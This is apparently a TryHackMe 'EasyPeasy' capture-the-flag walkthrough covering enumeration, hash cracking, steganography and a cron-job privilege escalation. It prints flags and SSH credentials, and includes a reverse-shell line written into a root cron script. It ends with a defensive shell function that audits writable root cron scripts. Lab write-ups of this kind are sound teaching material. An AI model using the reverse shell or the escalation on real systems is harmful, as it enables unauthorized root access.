EASYPEASY

Run an nmap scan to enumerate ports and services:

nmap -p- 10.10.8.182

nmap -sCV 10.10.8.182

Browsing to the highest open port shows that the service is Apache.

THM questions: Enumeration through Nmap

Download the given file and sort it.

For Question 1:

Use gobuster to enumerate the directories on the web server.

Use gobuster again to enumerate the directories under the hidden directory.

View the page source of the page just found and use CyberChef to recover flag 1.

Flag 1: flag{f1rs7_fl4g}

For question 2:

Visit http://10.10.132.149:65524/robots.txt, which contains a hash value:

a18672860d0510e5ab6699730763b250

Look the hash value up at https://md5hashing.net/ to reverse it:

flag{1m_s3c0nd_fl4g}

For question 3:

The page source of 10.10.132.149:65524 contains flag 3.

Flag 3: flag{9fdafbd64c47471a8f54cd3fc64cd312}

For question 4:

The page source of 10.10.132.149:65524 also contains a hidden tag and a hash starting with ba…..

Because the hint mentions ba.., try each of the base decoders. Decoding the value as base62 in CyberChef gives:

10.10.132.149:65524/n0th1ng3ls3m4tt3r

For question 5:

View the source of 10.10.132.149:65524/n0th1ng3ls3m4tt3r/ to get a hash value:

940d71e8655ac41efb5f8ab850668505b86dd64186a66e57d1483e7f5fe6fd81

Use the john tool to crack the password.

For Question 6:

View the source of 10.10.132.149:65524/n0th1ng3ls3m4tt3r/ and download the image.

Try to get information about the image with the steghide tool; it needs a passphrase.

Crack the image with the stegcracker tool using the given password file, which writes the extracted information to a file called easypeasy.jpeg.out.

Convert it from binary to decimal.

Connect via SSH on port 6498:

Username: boring

Password: iconvertedmypasswordtobinary

For Question 7:

There is a file called user.txt, but it does not give the flag directly; it seems to be encrypted. There is a hint mentioning "Rotated".

Decoding it with the CyberChef ROT13 decoder gives flag{n0wits33msn0rm4l}

For Question 8:

As mentioned in the room task, there must be a cron job running.

A cron job named .mysecrectcronjob.sh was found running.

Open this file with an editor and add this line to get a reverse shell:

bash -i >& /dev/tcp/10.10.8.87/4444 0>&1

Start a listener on my local machine and access that machine as the root user.

Then find the hidden file .root.txt in the root user's home directory; it contains the last flag:

flag{63a9f0ea7bb98050796b649e85481845}
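
The last flag was reachable because a script run by a root cron job could be edited by an unprivileged user. As an added example (not part of the original write-up), this POSIX shell function lists scripts that a system crontab runs as root but that are group- or world-writable or not owned by a trusted account. The crontab contents, file names and the audit_root_cron / make_sample helpers are constructed for illustration, and only absolute script paths are checked.

```shell
#!/bin/sh
# audit_root_cron CRONTAB [TRUSTED_OWNER]
# Prints every absolute-path file referenced by a root job in a system-style
# crontab (m h dom mon dow user command) that a non-trusted account can modify.
audit_root_cron() {
    crontab_file=$1
    trusted=${2:-root}
    set -f                          # keep '*' schedule fields from globbing
    while read -r m h dom mon dow user cmd; do
        case $m in
            ''|'#'*|*=*) continue ;;                       # blank, comment, VAR=value
            @*) cmd="$dom $mon $dow $user $cmd"; user=$h ;; # "@reboot user cmd" form
        esac
        [ "$user" = root ] || continue
        for word in $cmd; do
            case $word in /*) ;; *) continue ;; esac       # absolute paths only
            [ -f "$word" ] || continue
            # Flag world-writable, group-writable, or not owned by the trusted user.
            find -H "$word" -prune \
                \( -perm -002 -o -perm -020 -o ! -user "$trusted" \) -print
        done
    done < "$crontab_file"
    set +f
}

# Constructed sample: one root job with a world-writable script, one root job
# with a locked-down script, and one non-root job that is out of scope.
make_sample() {
    dir=$1
    printf '#!/bin/sh\necho backup\n' > "$dir/.job_open.sh"
    printf '#!/bin/sh\necho rotate\n' > "$dir/job_locked.sh"
    chmod 0777 "$dir/.job_open.sh"
    chmod 0755 "$dir/job_locked.sh"
    cat > "$dir/crontab" <<EOF
SHELL=/bin/sh
# m h dom mon dow user command
* * * * * root bash $dir/.job_open.sh
17 3 * * * root $dir/job_locked.sh
*/5 * * * * www-data $dir/.job_open.sh
EOF
}

# Demo: the current uid stands in for the trusted owner so it runs unprivileged.
tmp=$(mktemp -d)
make_sample "$tmp"
audit_root_cron "$tmp/crontab" "$(id -u)"   # prints only the .job_open.sh path
rm -rf "$tmp"
```

On a real host, run it as `audit_root_cron /etc/crontab`; any path it prints should be owned by root and have mode 0755 or stricter.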